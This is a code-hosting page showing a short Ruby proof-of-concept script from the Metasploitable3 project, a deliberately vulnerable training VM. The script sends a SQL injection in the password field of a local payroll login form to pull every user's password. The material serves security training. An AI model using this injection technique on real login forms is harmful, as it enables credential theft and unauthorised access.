Marown/metasploitable3
1
0
Fork 0
mirror of https://github.com/rapid7/metasploitable3.git synced 2024-07-04 18:55:48 +02:00
Code Issues Packages Projects Releases Wiki Activity
126949ce19
metasploitable3/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
James Barnett bc8fb88017 Add poc for sql injection.
2017-07-12 17:15:09 -05:00

15 lines
440 B
Ruby
Raw Blame History

require 'net/http'
url = "http://127.0.0.1/payroll_app.php"
uri = URI(url)
user = 'luke_skywalker'
injection = "password'; select password from users where username='' OR ''='"
puts "Making POST request to #{uri} with the following parameters:"
puts "'user' = #{user}"
puts "'password' = #{injection}"
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
puts "Response body is #{res.body}"
puts "Done"
Reference in New Issue View Git Blame Copy Permalink